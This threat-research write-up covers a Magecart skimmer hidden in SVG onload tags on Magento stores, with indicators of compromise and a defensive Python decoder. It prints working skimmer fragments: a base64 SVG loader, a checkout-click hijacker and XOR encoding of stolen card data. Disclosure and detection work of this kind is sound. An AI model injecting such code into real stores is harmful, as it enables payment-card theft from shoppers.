SVG Onload Tag Hides Magecart Skimmer on 99 Stores

by Sansec Forensics Team

Published in Threat Research − April 07, 2026

Sansec discovered a large-scale Magecart campaign using invisible SVG elements to inject a fake checkout overlay on 99 Magento stores, exfiltrating payment data to six attacker-controlled domains.

In the early hours of April 7th, nearly 100 Magento stores were mass-infected with a "double-tap" skimmer: a credit card stealer hidden inside an invisible SVG element. Sansec found stolen payment data flowing to six exfiltration domains, five of which were previously unknown. The likely entry vector is the PolyShell vulnerability, which continues to affect unprotected Magento stores.

The skimmer shows victims a convincing "Secure Checkout" overlay, complete with card validation and billing fields. After capturing payment details, it silently redirects the shopper to the real checkout page. Most victims never notice.

How the injection works

The attacker injects a 1x1 pixel SVG element into the store's HTML. The onload handler carries the entire skimmer payload as a base64 string: atob() decodes it, and the decoded string is handed to setTimeout, which evaluates it as code once the timer fires:

<svg
  width="1px"
  height="1px"
  onload="(()=>{setTimeout(atob('KGZ1bmN0aW9uKCl7IGlm...'),1)})()"
></svg>

This technique avoids creating external script references that security scanners typically flag. The entire malware lives inline, encoded as a single string attribute.

The fake checkout overlay

When a shopper clicks any checkout button, the skimmer intercepts the click with a capture-phase listener (useCapture set to true), so it runs before the store's own click handlers, and displays a full-screen modal overlay instead. The overlay includes a "Secure Checkout" header with a lock icon, card fields with real-time Luhn validation, and a full billing form. If the shopper selects "Other payment method," the skimmer closes and redirects to the real checkout.

The decoded payload shows how the overlay intercepts checkout navigation:

// checkoutUrl and show() are defined elsewhere in the decoded payload (not shown)
document.addEventListener(
  "click",
  function (e) {
    var el = e.target.closest('a,button,[role="button"]');
    if (!el) return;
    var href = el.getAttribute("href") || "";
    if (
      (href && checkoutUrl.includes(href)) ||
      el.getAttribute("data-role") === "proceed-to-checkout" ||
      el.id === "top-cart-btn-checkout"
    ) {
      e.preventDefault();
      e.stopImmediatePropagation();
      show(); // display fake checkout overlay
    }
  },
  true,
); // useCapture: fires before store's own handlers

Data exfiltration

After the victim submits the form, the skimmer collects all fields and encodes them using XOR with the key "script", followed by base64:

var raw = JSON.stringify(payload),
  encoded = "";
for (var i = 0; i < raw.length; i++)
  encoded += String.fromCharCode(
    raw.charCodeAt(i) ^ "script".charCodeAt(i % 6),
  );

var b64Payload = btoa(encoded);

The exfiltration URL itself is double-encoded via nested atob() calls. All six domains use the same endpoint: /fb_metrics.php, disguised as a Facebook analytics tracker. The skimmer sends data via fetch() POST with no-cors mode, falling back to a hidden iframe. After exfiltration, it sets localStorage.setItem('_mgx_cv', '1') to avoid capturing the same shopper twice, and redirects to the real checkout page.
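An incident responder who has captured one of these POST requests can reverse the encoding to see which fields were taken. The Python decoder below is an added example, not code from Sansec or from the skimmer. It undoes the base64 and the repeating-key XOR with "script", parses the JSON, checks for the {site:'rand0m'} campaign marker, and matches a request's host and path against the six domains and the /fb_metrics.php endpoint listed in this article. The sample payload is constructed, since the article does not reproduce the skimmer's field layout, and the card number is a standard test number.

```python
import base64
import json

XOR_KEY = b"script"  # repeating key used by the skimmer, per the article

# Network indicators from the article.
EXFIL_DOMAINS = {
    "statistics-for-you.com",
    "statistics-renew.com",
    "morningflexpleasure.com",
    "reusable-flex.com",
    "goingfatter.com",
    "wellfacing.com",
}
EXFIL_PATH = "/fb_metrics.php"


def xor_with_key(data: bytes, key: bytes = XOR_KEY) -> bytes:
    """Repeating-key XOR; applying it twice restores the input."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def encode_exfil(payload) -> str:
    """Mirror of the skimmer's encoding (JSON -> XOR 'script' -> base64).
    Used here only to build test input. The skimmer's btoa() works on
    Latin-1 code units, so for ASCII field values the bytes are identical."""
    raw = json.dumps(payload, ensure_ascii=True, separators=(",", ":"))
    return base64.b64encode(xor_with_key(raw.encode("latin-1"))).decode("ascii")


def decode_exfil(b64_payload: str):
    """Reverse the skimmer's encoding: base64 -> XOR 'script' -> JSON."""
    xored = base64.b64decode(b64_payload)
    return json.loads(xor_with_key(xored).decode("latin-1"))


def has_campaign_marker(payload) -> bool:
    """True if the decoded payload array carries the {site:'rand0m'} marker."""
    if not isinstance(payload, list):
        return False
    return any(isinstance(i, dict) and i.get("site") == "rand0m" for i in payload)


def is_exfil_request(host: str, path: str) -> bool:
    """Match a request against the article's domain and endpoint indicators."""
    return host.lower() in EXFIL_DOMAINS or path == EXFIL_PATH


# Constructed sample: the article does not show the real field layout, so this
# array only illustrates the campaign marker plus a dummy test card number.
SAMPLE_PAYLOAD = [
    {"site": "rand0m"},
    {"field": "cc_number", "value": "4111111111111111"},
    {"field": "cc_name", "value": "TEST CARDHOLDER"},
]
SAMPLE_B64 = encode_exfil(SAMPLE_PAYLOAD)

if __name__ == "__main__":
    decoded = decode_exfil(SAMPLE_B64)
    print("campaign marker present:", has_campaign_marker(decoded))
    for item in decoded:
        print(item)
    print("POST /fb_metrics.php flagged:", is_exfil_request("example.com", "/fb_metrics.php"))
```

Because XOR with a fixed key is symmetric, decode_exfil is the same operation the skimmer runs, only in the other direction; the decoded array can be handed to the payment processor for card replacement and to customer notification.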

Indicators of Compromise

Exfiltration domains

All six domains resolve to 23.137.249.67, hosted at IncogNet LLC (AS40663) in the Netherlands.

| Domain | Confirmed victims |
| --- | --- |
| statistics-for-you.com | 15 |
| statistics-renew.com | 14 |
| morningflexpleasure.com | 14 |
| reusable-flex.com | 12 |
| goingfatter.com | 11 |
| wellfacing.com | 10 |

Technical indicators

| Indicator | Value |
| --- | --- |
| Injection method | <svg width="1px" height="1px" onload="..."> |
| Payload encoding | base64 via atob(), executed via setTimeout |
| Data encoding | XOR with key "script", then base64 |
| Exfil endpoint | /fb_metrics.php |
| Exfil method | fetch() POST no-cors, fallback hidden iframe |
| localStorage key | _mgx_cv |
| Campaign marker | {site:'rand0m'} in payload array |
| Exfil server | 23.137.249.67 (IncogNet LLC, AS40663, NL) |

Recommendations

  1. Block attacks: Deploy Sansec Shield to block exploitation attempts in real-time
  2. Scan for compromise: Run eComscan to detect this skimmer and other malware, backdoors, and vulnerabilities
  3. Check for the SVG tag: Search your page source for <svg elements with onload attributes containing atob(
  4. Clear localStorage: Infected stores should advise affected customers. The _mgx_cv key in browser localStorage indicates a shopper's payment data was captured
